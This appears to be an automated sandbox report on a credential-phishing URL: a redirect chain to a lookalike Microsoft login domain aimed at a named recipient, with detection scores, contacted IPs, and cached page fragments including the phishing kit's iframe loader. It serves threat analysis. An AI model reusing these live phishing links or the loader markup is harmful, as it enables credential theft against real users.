Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2968 --field-trial-handle=2924,i,12212526387744986071,14092912345193000886,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	0%	Avira URL Cloud	safe
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	2%	Virustotal		Browse
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://onmicrosoffice.online/?qrc=barbara.rentler%40ros.com	0%	Avira URL Cloud	safe
https://onmicrosoffice.online?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ub	0%	Avira URL Cloud	safe
https://onmicrosoffice.online/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js	0%	Avira URL Cloud	safe
https://onmicrosoffice.online/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ubWljcm9zb2ZmaWNlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74	0%	Avira URL Cloud	safe
https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/favicon.ico	0%	Avira URL Cloud	safe
https://onmicrosoffice.online/owa/?login_hint=barbara.rentler%40ros.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
onmicrosoffice.online	89.116.187.236	true	false	unknown
challenges.cloudflare.com	104.17.2.184	true	false	high
insidesales-email.com	34.233.171.195	true	false	unknown
www.google.com	142.250.141.99	true	false	high
cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	104.21.52.206	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	true		unknown
https://onmicrosoffice.online/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ubWljcm9zb2ZmaWNlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/879669880fea0acd/1713965058384/5bc5949f26cf89d93f31e31abc75d33badd9ed53032d1de910949dd3595c52bb/fXUOLayyxgzrnsg	false		high
https://onmicrosoffice.online/?qrc=barbara.rentler%40ros.com	false	Avira URL Cloud: safe	unknown
https://onmicrosoffice.online/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal	false		high
https://challenges.cloudflare.com/turnstile/v0/b/471dc2adc340/api.js?onload=onloadTurnstileCallback	false		high
https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com	true		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469	false		high
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879669880fea0acd	false		high
https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/favicon.ico	false	Avira URL Cloud: safe	unknown
https://onmicrosoffice.online/owa/?login_hint=barbara.rentler%40ros.com	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.opensource.org/licenses/mit-license.php)	chromecache_56.2.dr	false		high
https://onmicrosoffice.online?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ub	chromecache_49.2.dr	false	Avira URL Cloud: safe	unknown
http://knockoutjs.com/	chromecache_56.2.dr	false		high
https://github.com/douglascrockford/JSON-js	chromecache_56.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.141.99	www.google.com	United States	15169	GOOGLEUS	false
89.116.187.236	onmicrosoffice.online	Lithuania	15419	LRTC-ASLT	false
104.17.3.184	unknown	United States	13335	CLOUDFLARENETUS	false
34.233.171.195	insidesales-email.com	United States	14618	AMAZON-AESUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.52.206	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	United States	13335	CLOUDFLARENETUS	false
104.17.2.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.67.203.167	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431105
Start date and time:	2024-04-24 15:23:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@20/15@16/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.2.94, 142.251.2.139, 142.251.2.138, 142.251.2.101, 142.251.2.113, 142.251.2.100, 142.251.2.102, 142.251.2.84, 34.104.35.123, 13.85.23.86, 23.204.146.169, 23.204.146.147, 23.204.146.145, 192.229.211.108, 52.165.164.15, 142.250.101.94
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3255), with no line terminators
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.228960120417607
Encrypted:	false
SSDEEP:	48:0aXW4lNPkiWUZmbWYBc36yKrnVjbv8+qfOcqwFtiGNir98SKZyEk0s4tPA:dGeCU4tBcXanFISch+r98SKZdFsi4
MD5:	C99023B4BE9253FA437E561D72094DF4
SHA1:	42489DC82DA145669F514E3CBB98658D9F94888C
SHA-256:	4FCFC0E87DECC127B79AEB1E7D647097CC25215D276EAECA010C44A7092F5401
SHA-512:	00D4836C333A6D6C7E669587CE25434E406ACE2C79BF319BBACEB4815CB004210EB94E4D8CA9120B4E857F2B0DF22D72A44F6AF66F82B84F465ABFDC0A1DF51A
Malicious:	false
Reputation:	low
Preview:	<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewport> <script>var verifyCallback_CF=function (response){var cfForm=document.querySelector("#cfForm"); if (response && response.length > 10){cfForm.submit(); return;}}; window.onloadTurnstileCallback=function (){turnstile.render("#turnstileCaptcha",{sitekey: "0x4AAAAAAAX1FyqfrSUlMHQ3", callback: verifyCallback_CF,});};</script></head><style>.h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-co

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1184), with no line terminators
Category:	downloaded
Size (bytes):	1184
Entropy (8bit):	5.48304521724181
Encrypted:	false
SSDEEP:	24:0jHkqkVWgZL0OeyWoMWxezfRqRkUtgp/tH1XAV9Uhea:0fgR0OeFoXxceR2p/LQjUIa
MD5:	75AAA3B5358BCF23DA62F4690F8362B0
SHA1:	D0B3865A56C9330967769554A48FBF79548FF837
SHA-256:	71A6329D51911303743D3A5111BFD42A7B1DA1355A7F87F1DEE7FD7F4EA48CC0
SHA-512:	EF89980357455148AE6746CB30E335E6017D20411E4772DEFC670F762DA38D476A5C99C23835AA09C2701DBD70A1BCB30A9345FFED94450464FC45DB2A555E96
Malicious:	false
Reputation:	low
URL:	https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com
Preview:	<!doctype html><html><head><meta http-equiv="Content-Security-Policy" content="default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';"></head><body><iframe id="iframe" sandbox="allow-modals allow-same-origin allow-same-origin allow-scripts allow-popups allow-forms" name="iframe" width="100%" height="100%" src="https://onmicrosoffice.online?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ubWljcm9zb2ZmaWNlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74"

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 59 x 6, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.068159130770307
Encrypted:	false
SSDEEP:	3:yionv//thPlKTuUC7Bxl/k4E08up:6v/lhPs6j7B7Tp
MD5:	C100A77A7497AFFEB33046F19FA8131A
SHA1:	B5F360C0DA1B95E001B84564CEEECC72C132B848
SHA-256:	0BC4FDB112A3526577CF0088E51085AC853E421F768DB8E5F9CD0E2C267BE144
SHA-512:	5979BB72FB6FEB0811B228C336D17DB2DE6FB43490EC2C35D20889EB51E79821FAC658491CB58701BB39422CD386D3C676AEF3EB696FEBA211DBC30177493118
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U
Preview:	.PNG........IHDR...;..........q.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:	3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:	3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (42414)
Category:	downloaded
Size (bytes):	42415
Entropy (8bit):	5.374174676958316
Encrypted:	false
SSDEEP:	768:JC9//LuIHdpbSt3JoVMjX1y48S7d1dxoqmNdKyBVnPNAZASyXY1eO4mH19B59:OuIHdpbSt3vFy4X4PNdN+9
MD5:	F94A2211CE789A95A7C67E8C660D63E8
SHA1:	F1FC19B6BCB96D0A905BF3192AAFF0885FF9F36F
SHA-256:	926DC3302F99EC05E4206E965DDEB7250F5910A8C38E82C7BEAFB724BBAAF37B
SHA-512:	EAC0FC89C2D6CCEB9F4C18DFC610DFF8BC194D3994F0C74B3D991F8423C6DADE11D805E76124596521C58AFA9939B45D2D3157F0A48626E12548020FC38364D3
Malicious:	false
Reputation:	low
URL:	https://challenges.cloudflare.com/turnstile/v0/b/471dc2adc340/api.js?onload=onloadTurnstileCallback
Preview:	"use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);function m(h){bt(s,o,u,m,b,"next",h)}function b(h){bt(s,o,u,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),o.forEach(function(u){Ie(e,u,t[u])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3255), with no line terminators
Category:	downloaded
Size (bytes):	3255
Entropy (8bit):	5.228960120417607
Encrypted:	false
SSDEEP:	48:0aXW4lNPkiWUZmbWYBc36yKrnVjbv8+qfOcqwFtiGNir98SKZyEk0s4tPA:dGeCU4tBcXanFISch+r98SKZdFsi4
MD5:	C99023B4BE9253FA437E561D72094DF4
SHA1:	42489DC82DA145669F514E3CBB98658D9F94888C
SHA-256:	4FCFC0E87DECC127B79AEB1E7D647097CC25215D276EAECA010C44A7092F5401
SHA-512:	00D4836C333A6D6C7E669587CE25434E406ACE2C79BF319BBACEB4815CB004210EB94E4D8CA9120B4E857F2B0DF22D72A44F6AF66F82B84F465ABFDC0A1DF51A
Malicious:	false
Reputation:	low
URL:	https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/favicon.ico
Preview:	<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewport> <script>var verifyCallback_CF=function (response){var cfForm=document.querySelector("#cfForm"); if (response && response.length > 10){cfForm.submit(); return;}}; window.onloadTurnstileCallback=function (){turnstile.render("#turnstileCaptcha",{sitekey: "0x4AAAAAAAX1FyqfrSUlMHQ3", callback: verifyCallback_CF,});};</script></head><style>.h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-co

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 59 x 6, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.068159130770307
Encrypted:	false
SSDEEP:	3:yionv//thPlKTuUC7Bxl/k4E08up:6v/lhPs6j7B7Tp
MD5:	C100A77A7497AFFEB33046F19FA8131A
SHA1:	B5F360C0DA1B95E001B84564CEEECC72C132B848
SHA-256:	0BC4FDB112A3526577CF0088E51085AC853E421F768DB8E5F9CD0E2C267BE144
SHA-512:	5979BB72FB6FEB0811B228C336D17DB2DE6FB43490EC2C35D20889EB51E79821FAC658491CB58701BB39422CD386D3C676AEF3EB696FEBA211DBC30177493118
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...;..........q.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45571)
Category:	downloaded
Size (bytes):	141349
Entropy (8bit):	5.430886196976165
Encrypted:	false
SSDEEP:	1536:5/Z5ELQbTPRUbx3jog/MhTJvRkmYWp0BSYmvIxdL/Bpns0Vgt2CTJm0wTxFojd9v:REArg/M1Nn3vIPzDk80ZjT0qQePIy
MD5:	951C2E51B2BCACB9731E611513DD58D8
SHA1:	E6388042769E5FE8B794AA43C480E37B860BA058
SHA-256:	A2373C54BD20A19D80E8577AB1BB0CD1E18E6104F0A08C62782611600655A93C
SHA-512:	B905978EF6FDF6067AB3BC5A0DAC0751ECBDEF2762FDA66B314F6E7ED2C5C926FCD0E17CECD35DAAF6393D80D21463717CCE38EF6B92CD5F9FCC4172F09F92C5
Malicious:	false
Reputation:	low
URL:	https://onmicrosoffice.online/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js
Preview:	/!. ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,r,i=n[0],a=n[1],s=0,u=[];s<i.length;s++)

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 15:23:57.011683941 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 24, 2024 15:23:58.261590958 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 24, 2024 15:24:07.507385969 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.507438898 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:07.507519960 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.507770061 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.507791042 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:07.531224012 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.531244040 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:07.531321049 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.531877041 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:07.531888008 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:07.918138981 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 24, 2024 15:24:08.158444881 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.158761024 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.158798933 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.159693003 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.159774065 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.160865068 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.160927057 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.161133051 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.161144972 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.177154064 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.177438974 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.177459955 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.178349972 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.178421021 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.178760052 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.178818941 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.201241016 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.232336044 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.232356071 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.278891087 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.378318071 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.378382921 CEST	443	49735	34.233.171.195	192.168.2.4
